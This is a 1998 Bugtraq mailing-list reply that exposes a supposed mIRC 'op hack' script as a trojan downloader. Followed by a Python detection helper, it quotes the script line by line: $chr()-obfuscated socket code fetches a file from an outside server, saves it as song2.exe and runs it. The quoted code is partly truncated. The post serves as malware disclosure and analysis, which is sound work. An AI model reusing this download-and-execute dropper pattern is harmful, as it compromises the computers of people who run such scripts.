Bugtraq mailing list archives
Re: your mail
From: cacaio () DEATHKNIGHTS COM (Cacaio Torquato)
Date: Sat, 14 Nov 1998 19:37:29 -0200
At 14:50 13/11/98 -0500, root () BRAMPTON1 NETMATRIX NET wrote:
Hi, while debugging/hexing/disassembling mirc my friend slotmech last week found a mirc bug which allows to force users to send MODE commands to the server. this example script sends a MODE +o to the irc server. the mirc author has been notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us.
Are you nutz man? Your code simply makes whoever wants to get op get a file in your server and execute it. I'm glad you weren't smart enough to place the full address of your server. For the ones who want to know exactly what's happening, I will explain step by step the code. Your attempt to install your file in everyone that wants to hack ops was funny, just funny...
alias hackop { ... checklen $1 ... }
call the function checklen - see below
alias checklen {
  .if (%xcomplete == 1) halt
  .if (%xinprog == 1) halt
  .set %xfilename song2.exe
  .set %xlof $lof(%xfilename)
  .set %xfirst 1
  .write -c %xfilename
sets the filename to song2.exe, and clears it if something is on it already.
  ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$
  .sockclose protx
if this line is uncommented, it displays in the screen the following message: d o n t - s p o i l - t h e
  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$
}
opens a sock connection with the server designed. the one placed in his code is www.g (i think he forgot the rest)
on 1:sockopen:protx: {
  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$
  .sockwrite -n protx
}
when this sock connection is opened, he sends the request 'GET /Belta/9' to the server and starts receiving data
on 1:sockread:protx: {
  .sockread &test
  .set %xlof $lof(%xfilename)
  .if (%xfirst == 1) set %xlof 0
  .set %xfirst 0
  .bwrite %xfilename %xlof $sockbr &test
}
just receives the data and makes it a file
on 1:connect:checklen
why is it here? because when the user connects to the irc server, the script will grab the file again, and again and again.
on 1:sockclose:protx: {
  .sockread &test
  if ($sockbr > 0) {
    .set %xlof $lof(%xfilename)
    .bwrite %xfilename %xlof $sockbr &test
  }
finish writing file
.if ($lof(%xfilename) == 178306) { .run %xfilename .set %xcomplete 1 }
if the size of the file, in bytes, is equal to 178306, runs the file
if ($lof(%xfilename) != 178306) { .timer 1 300 checklen }
if the size of the file, in bytes, is minor to 178306, starts a timer that in 300 seconds will get the file again
}
unset %xinprog
unset %xfilename
unset %xlof
unset %xfirst
}
unset the garbage variables

-----------
that's it

Best regards,
--
Cacaio Torquato       http://www.deathknights.com/cacaio
The Death Knights     http://www.deathknights.com
zelur xuniL
Tedio INC.            http://www.tedio.org
Think Blue.
+-------------------------------------------------------+
|         BrasNet IRC Servers Network - Brazil          |
|   irc.brasnet.org                irc.webtech.com.br   |
|                    irc.sol.com.br                     |
+-------------------------------------------------------+
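
The `$chr()` decoding done by hand in the message above, as an added example that is not part of the original post or of the script it analyses: a Python triage helper that evaluates `$chr(N)` / `$+` chains and flags the socket-open, binary-write and run combination. The sample lines are constructed from the untruncated fragments quoted in the post; `decode_chr_chain` and `triage` are hypothetical names.

```python
import re

# Constructed sample: the untruncated fragments quoted in the post above.
SAMPLE = [
    ".sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103)",
    ".sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ "
    "$chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57)",
    ".bwrite %xfilename %xlof $sockbr &test",
    ".if ($lof(%xfilename) == 178306) { .run %xfilename .set %xcomplete 1 }",
]

CHR = re.compile(r"\$chr\((\d{1,3})\)")
CMD = re.compile(r"(?:^|[\s{])\.?(sockopen|sockwrite|bwrite|run)\b")


def decode_chr_chain(line):
    """Evaluate $chr(N) and the $+ join operator: tokens are space
    separated, and $+ glues its neighbours together with no space."""
    out, glue = [], False
    for tok in line.split():
        if tok == "$+":
            glue = True              # a repeated "$+ $+" is still one join
            continue
        m = CHR.fullmatch(tok)
        text = chr(int(m.group(1))) if m else tok   # truncated tokens stay literal
        if glue and out:
            out[-1] += text
        else:
            out.append(text)
        glue = False
    return " ".join(out)


def triage(lines):
    """Return (decoded lines, traits seen, download-and-run verdict)."""
    decoded = [decode_chr_chain(line) for line in lines]
    traits = set()
    for d in decoded:
        traits.update(CMD.findall(d))
        if re.search(r"\bGET\s+/\S*", d):
            traits.add("http-get")   # HTTP request hidden behind $chr()
    return decoded, traits, {"sockopen", "bwrite", "run"} <= traits


if __name__ == "__main__":
    decoded, traits, dropper = triage(SAMPLE)
    for d in decoded:
        print(d)
    print(sorted(traits), "download-and-run:", dropper)
```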